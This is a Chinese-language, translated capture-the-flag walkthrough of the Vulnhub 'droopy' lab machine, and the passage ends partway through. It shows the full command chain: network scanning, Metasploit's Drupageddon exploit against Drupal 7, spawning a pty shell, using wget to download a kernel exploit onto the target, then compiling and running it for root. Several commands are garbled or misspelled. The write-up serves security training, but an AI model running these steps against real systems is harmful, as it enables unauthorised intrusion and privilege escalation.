CTF夺旗挑战!看老外如何玩转! 即刻安全
发布时间:2018-05-07 | 发布者: 东东工作室 | 浏览次数: 次你的位置:即刻安全 > 原创翻译 > CTF夺旗挑战!看老外如何玩转!
CTF夺旗挑战!看老外如何玩转!原创翻译 Eternal 2年前 (2016-08-31) 2077浏览
在这篇文章中,我们将完成一个 CTF系列的 root2boot 挑战!这个演练将在 droopy 这个漏洞框架上完成,这是一个有一定难度的框架平台。我们可以从这里下载到:https://download.vulnhub.com/droopy/ 。
演练开始:
首先让我们来确定我们要攻击的目标,利用 IP 扫描工具 netdiscover 来查找目标 IP:
netdiscover
我们要攻击的目标是 192.168.1.103 ,确定目标后我们再利用 nmap 来进行服务端口的扫描:
nmap -A 192.168.1.103
通过以上简单的扫描,我们可以看到目标开放了 80 端口,并且使用了带有利用漏洞的 Drupal 7 版本(Drupal是使用PHP语言编写的开源内容管理框架(CMF)),在得到以上信息后,下面我们使用 MSF 来对漏洞进行利用!
search drupal
我们使用一下利用模块:
use exploit/multi/http/drupal_drupageddon
msf exploit (drupal_drupageddon)>set rhost 192.168.1.103 (目标机器IP)
msf exploit (drupal_drupageddon)>set rport 80
msf exploit (drupal_drupageddon)>exploit
在成功利用了漏洞后,我们得到了一个 meterpreter 的 session ,为了有一个更加直观的显示路径,我们接着使用如下命令,来进入 droopy的终端界面:
hell
echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py
python /tmp/asdf.py
进入终端界面后,我们首先来查看该目标系统的内核版本:
lsb_release -a
通过以上命令查看,我们得知 该乌班图系统的内核版本为 Ubuntu 14.04 。我们通过 exploit-db.com 这个网站来查找该版本的 exploit !如下:我们成功找到了该版本的 exploit !
由于该 exploit 无法再 MSF上直接利用,因此我们需要在目标系统上找到一个有写和执行权限的文件,来下载并执行 exploit !
find / -writable -type d 2>/dev/null
cd /tmp/
wget https://www.exlpoit-db.com/download/37292
下面我们来编译并运行 exploit 以获取 root 权限!
mv 37292 37292.c
gcc 37292.c -o kernel
chmod 777 kernel
./kernel
接着我们通过简单的命令查看,我们是否已经取得 root 权限:
whoami
cd /root
ls
接着我们在目标系统上发现了一个名为 dave.tc 的文件,当我们使用浏览器打开它时,提示我们进行下载。我们只需将其拷贝到站点根目录下,进行下载即可!
Cp dave.tc /var/ww/html
下载完成后,我们使用 veracrypt 来打开它。veracrypt的下载地址:https://veracrypt.codeplex.com/wikipage?title=Downloads
当你打开 VeraCrypt 选择 1 它就会将硬盘挂载到 1 硬盘上。
当你尝试打开该文件时,会弹出一个密码输入框,要求我们输入密码。可是现在我们并没有密码,我们来破解密码!
我们进入到保存系统全部密码 hash 值得文件下:
转载请标注:我爱技术网——CTF夺旗挑战!看老外如何玩转! 即刻安全